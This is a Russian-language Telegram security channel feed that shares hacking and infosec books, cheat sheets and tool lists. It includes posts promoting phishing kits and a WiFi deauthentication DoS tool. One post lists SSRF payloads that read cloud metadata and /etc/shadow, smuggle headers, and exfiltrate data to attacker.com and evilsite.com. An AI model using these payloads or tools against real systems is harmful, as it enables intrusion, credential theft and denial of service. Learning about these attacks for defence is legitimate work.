Архив Безопасника
10.9K subscribers
616 photos
68 videos
356 files
668 links
Материалы по хакингу и информационной безопасности со всего интернета.

Сотрудничество: @workhouse_price

РКН: https://clck.ru/3MENGA
Download Telegram
Linux для сетевых инженеров.zip
11.3 MB
😁 Linux для сетевых инженеров

Книга даст исчерпывающее представление о том, как устроена работа с сетью в Linux.

В начале описаны основные дистрибутивы и рассказано, как выбрать правильный и настроить простейшую сетевую конфигурацию.

Затем идет речь о диагностике, брандмауэре и использовании Linux в качестве узла для сетевых служб. Наконец, работая с примерами сборок, вы овладеете различными вариантами защиты от распространенных видов атак.

Автор: Роб Ванденбринк
Год выхода: 2024

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22
This media is not supported in your browser
VIEW IN TELEGRAM
📄 Подбока интересных шпаргалок

Шпаргалка Docker
Шпаргалка по пентесту мобильных приложений
Шпаргалка командной строки OSX
Шпаргалка PowerShell – Шпаргалка SANS PowerShell из курса SEC560 (версия в формате PDF)
Rawsec's CyberSecurity Inventory – инвентарь инструментов, ресурсов, платформ CTF и операционных систем с открытым исходным кодом о CyberSecurity. (Источник)
Шпаргалка безопасности Regexp
Коллекция шпаргалок по безопасности
Шпаргалка Unix/Linux

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍31
🤔 Подборка лучших инструментов фишинга для Kali Linux

Фишинг
самый популярный способ в хакерстве
, его используют для взлома социальных сети, электронной почты, онлайн-покупки и банковские транзакции, и все они требуют использования нашей информации для входа или личных данных

В этой статье мы обсудим некоторые фишинговые инструменты для Kali Linux

1. Socialphish – это инструмент для фишинга с открытым исходным кодом и множеством функций

2. ShellPhish – это инструмент, который мы можем использовать для создания фишинговых страниц для наиболее известных сайтов социальных сетей, таких как Facebook, Twitter и Instagram

3. Zphisher – это инструмент для фишинга с открытым исходным кодом и множеством функций

4. Blackeye – это мощный инструмент фишинга с открытым исходным кодом. В наши дни становится все более известным Blackeye, который используется для проведения фишинговых атак на цель

5. King Phisher – это инструмент, который имитирует реальные фишинговые атаки для тестирования и продвижения

6. Blackphish – это фишинговый инструмент с открытым исходным кодом и множеством функций

Более подробно о установке инструментов читайте в статье

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥51
💉 Шпаргалка по SQL-инъекциям

Эта шпаргалка по SQL-инъекциям содержит примеры полезного синтаксиса, который можно использовать для различных задач, часто возникающих при выполнении атак с помощью SQL-инъекций

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥5
Контролируемый взлом.zip
30.6 MB
💸 Контролируемый взлом | Библия социальной инженерии, 2 издание

Социальная инженерия
– это направленная манипуляция человеком с целью выполнения им определённых действий и раскрытия конфиденциальной информации


Книга рассматривает используемые современными кибер преступниками методы социальной инженерии и способы защиты от нее – как организационные, так и технические

Автор: Другач Ю.С.
Год выхода: 2024

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍9
CheatSheet Digital Forensics S.E..pdf
888.6 KB
🤖 Шпаргалка по форензике | 108 страниц полезных команд

Основная цель при проведении форензики
– использование методов и средств для сохранения (неизменности), сбора и анализа цифровых вещественных доказательств, для того чтобы восстановить события инцидента.

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍2
Forwarded from Social Engineering
📚 Коллекция книг для ИБ специалистов.

• В нашем втором канале проходит небольшой розыгрыш, где победители смогут получить коллекцию актуальных и полезных книг для ИБ специалистов:

- Сети глазами хакера;
- Контролируемый взлом. Библия социальной инженерии;
- Хакерство. Секреты мастерства;
- Тестирование на проникновение с Kali Linux;
- Хакерство. Физические атаки с использованием хакерских устройств.

• Каждый победитель получит сразу весь пул книг в бумажном варианте, которые перечислены выше. Принять участие можно тут: https://t.me/it_secur/2235

S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍93🔥2
👀 15 лучших OSINT-инструментов для сбора данных и анализа угроз

OSINT Framework веб-инструмент, который структурирует ссылки на ресурсы OSINT по категориям, таким как соцсети, анализ доменов и IP. Очень полезен для быстрой навигации и выбора нужных инструментов.
Google Dorks инструмент использует специальные поисковые операторы Google для поиска информации, которая не отображается при обычном поиске. Google Dorks помогает находить уязвимости, скрытые файлы и конфиденциальные данные на сайтах.
theHarvester инструмент используется для сбора данных об email, субдоменах, IP-адресах, доменах и открытых портах. Он полезен для начальных этапов проникновения и сбора разведданных о компаниях или веб-ресурсах.
SecurityTrails предоставляет доступ к данным о DNS, WHOIS, истории доменов и IP-адресов, что делает его полезным для мониторинга доменных записей и анализа сетевых угроз.
BGPViewэтот инструмент отслеживает маршруты BGP (граничный шлюзовый протокол), что помогает анализировать сетевые маршруты, отслеживать изменения в маршрутизации и выявлять потенциальные угрозы.
Recorded Future's Vulnerability Database Этот инструмент предоставляет базу данных уязвимостей (CVE), что помогает специалистам по безопасности быть в курсе последних угроз и уязвимостей.
Triage Malware Sandbox Платформа для анализа вредоносного ПО, которая позволяет безопасно тестировать и выявлять поведение вредоносных файлов в песочнице, помогая анализировать угрозы.
Mitaka Расширение для браузера, которое помогает анализировать домены, IP-адреса и хэши прямо из браузера. Оно интегрирует множество OSINT-источников для быстрого сбора данных.
Recorded Future Browser Extension Расширение для браузера от Recorded Future помогает собирать разведданные об угрозах прямо во время просмотра веб-сайтов, что ускоряет процесс анализа угроз и угроз безопасности.
Have I Been Pwned? Сайт, который позволяет пользователям проверить, были ли их учетные данные скомпрометированы в утечках данных. Он предоставляет информацию о том, были ли украдены email-адреса или пароли.
BuiltWith Этот инструмент анализирует веб-сайты и определяет, какие технологии используются, такие как серверное ПО, CMS и аналитические инструменты. Полезен для анализа конкурентов и изучения технической инфраструктуры сайтов.
Shodan это поисковая система, предназначенная для поиска устройств, подключенных к интернету (IoT, камеры, серверы и т.д.), и выявления уязвимостей в этих устройствах.
SpiderFoot это автоматизированный инструмент для сбора OSINT, который использует более 100 различных источников данных для анализа IP-адресов, доменов и электронной почты.
Maltego это инструмент для визуализации и анализа данных, который помогает выявлять взаимосвязи между различными объектами, такими как домены, IP и люди. Инструмент особенно полезен для проведения комплексных расследований.
Nmap один из самых популярных сетевых сканеров, который используется для сканирования сетей и портов. Его интеграция с OSINT помогает собирать данные о сетевой инфраструктуре и выявлять уязвимости.

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
Android глазами хакера.pdf
21.5 MB
📱 Android глазами хакера, 2-е издание

Рассмотрена внутренняя архитектура ОС Android, используемые ею разделы и файловые системы, принцип работы механизмов обновления и внутренних инструментов безопасности

Рассказано о разграничении доступа в ОС Android, о привилегиях, методах получения прав root, кастомизации и установке нестандартных прошивок

📝 Описаны инструменты для дизассемблирования, отладки и анализа кода мобильных приложений, приведены примеры модификации кода с целью изменения функций ПО и внедрения в приложение сторонних модулей

Даны подробные рекомендации по деобфускации кода и обходу антиотладки, а также практические советы по защите собственных приложений от декомпиляции и исследования

🦠 Приводятся сведения о вредоносных программах для платформы Android, используемых ими уязвимостях, даны примеры кода таких программ

Рассказывается об использовании стандартных функций Android в нестандартных целях и способах противодействия вредоносному ПО

Автор: Е. Зобнин
Год выхода: 2024

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥163🤯2👎1
🧰 Лучшие инструменты для проверки безопасности SSL TLS

Содержание статьи
Уязвимости в реализации и настройках протоколов SSL/TLS
Лучшие инструменты для проверки безопасности SSL/TLS
— Проверка безопасности SSL/TLS с Testssl.sh
— Проверка безопасности SSL/TLS с Sslscan
— Проверка безопасности SSL/TLS с Nmap
— Проверка безопасности SSL/TLS с SSLyze
— Поиск уязвимостей SSL/TLS  онлайн с HostedScan

В статье рассмотрим лучшие инструменты, которые помогут проверить безопасность SSL/TLS соединений и выявить потенциальные уязвимости

SSL (secure sockets layer – уровень защищённых cокетов) – это криптографический протокол для безопасной связи

TLS (Transport Layer Security) – криптографический протокол, который обеспечивает безопасную передачу данных на транспортном уровне

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥4👏2
❗️ Инструмент для проведения атак на WiFi

Wifi-deauth – это инструмент DDoS атаки deauth на WiFi сети, который отключает все устройства от целевой сети Wi-Fi (2,4 ГГц и 5 ГГц)

После того, как злоумышленник выбирает целевую точку доступа для атаки, программа:
Постоянно отправляет поддельные пакеты аутентификации с использованием адреса широковещательного mac в качестве пункта назначения
Начинает нюхать клиентов, подключенных к точки доступа, фильтруя определенные фреймы пакетов 802.11 и отправляя поддельные пакеты деаутентифиции этим клиентам в дополнение к адресу широковещания

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍93
👀 OSINT: Поиск по интернету вещей, IP, доменам и поддоменам

Shodan – знаменитая поисковая система для сбора информации об устройствах, подключенных к интернету.
Censys Search, GreyNoise, ZoomEye, Netlas, CriminalIp – аналогичные Shodan поисковые системы, ориентированные на IoT.
Buckets by Grayhatwarfar – база данных с общедоступным поиском по открытым AWS Buckets, Azure Blobs, Digital Ocean Spaces.
Public buckets – поиск общедоступных бакетам AWS S3 & Azure Blob.
macaddress.io, MAC Vendor Lookup, maclookup.app –определяют производителя устройства по MAC-адресу, OUI или IAB.

🔥 – если хотите больше таких подборок

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥422
C# глазами хакера.zip
14.1 MB
👁 C# глазами хакера

Подробно рассмотрены все аспекты безопасности от теории до реальных реализаций .NET-приложений на языке C#


Перечислены уязвимости, которые могут быть присущи веб-сайтам и Web API, описано, как хакеры могут эксплуатировать уязвимости и как можно обеспечить безопасность приложений

Рассмотрены сетевые функции: проверка соединения, отслеживание запроса, доступ к микросервисам, работа с сокетами и др.

Приведены реальные примеры атак хакеров и способы защиты от них

Автор: Фленов М.
Год выхода: 2022

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4😈1
Основы_криптографии_и_подстановочные_шифры_zip.003
1.4 GB
📖 Криптография и шифры: основы

В курсе вы научитесь:
Основным подходам, методам и алгоритмам современной криптографии.
Некоторым криптографическим шифровальным системам, основанным на подстановке символов открытого алфавита для получения шифроалфавита.
Узнаете про самые первые шифры, появляющиеся на протяжении всей истории человечества.
Основным криптографическим шифрам подстановки и принципам их построения и сможете применять распространенные криптографические шифры на практике.

Удаляете и открываете как zip; 002 и другие оставляете в той же папке что и тот что открываете

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍3🦄1
List of Ransomware HD.png
643.5 KB
📄 Шпаргалка по Ransomware

Ransomware (вирус-шифровальщик, вирус-вымогатель)
– это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.

Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним

Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍42👾1
😈 5 часто используемых SSRF нагрузок

SSRF (Server-Side Request Forgery)
– это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера

Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение


SSRF пейлоады могут включать
манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей

1. Сканирование внутренней сети
Получение метаданных с инстансов AWS EC2:
http://169.254.169.254/latest/meta-data/

Получение метаданных с инстансов Google Cloud:
http://metadata.google.internal/computeMetadata/v1/instance/

Получение метаданных с инстансов Azure:
http://169.254.169.254/metadata/v1/

2. Получение файлов
Получение содержимого файла /etc/passwd:
file:///etc/passwd

Получение содержимого файла /etc/shadow (если доступно):
file:///etc/shadow

Получение содержимого файла boot.ini (Windows):
file:///c:/boot.ini


3. Взаимодействие с внешними сервисами
Получение содержимого внутреннего сайта и отправка его на сервер злоумышленника:
http://attacker.com/?url=http://internal.site.com/

Попытка подключиться к FTP-серверу, управляемому злоумышленником:
ftp://attacker.com/


4. Протокольный smuggling
Использование протокольного smuggling для изменения заголовка Host:
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a

Добавление фрагмента URL для обмана сервера, чтобы он подумал, что запрос предназначен для attacker.com:
http://internal.site.com:80%23attacker.com


5. Эксфильтрация данных через DNS
Использование DNS-запроса для передачи данных на сервер, контролируемый злоумышленником:
http://attacker.com/?url=http://x.x.x.x/

Использование поддомена для эксфильтрации данных на сервер злоумышленника:
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/


👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥53
Криптографические_методы_защиты_информации.pdf
9.5 MB
🔒 Криптографические методы защиты информации

В настоящем пособии рассмотрены только основные математические методы защиты информации, и среди них главный акцент сделан на криптографическую защиту, которая включает:
симметричные и несимметричные методы шифрования
формирование секретных ключей
протоколы ограничения доступа и аутентификации сообщений и пользователей

Кроме того, в пособии рассматриваются типовые уязвимости операционных и информационно вычислительных систем

Авторы: Владимиров С. М.
Габидулин Э. М.
Колыбельников А. И.
Кшевецкий А. С.
Год выхода: 2020

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍162🦄2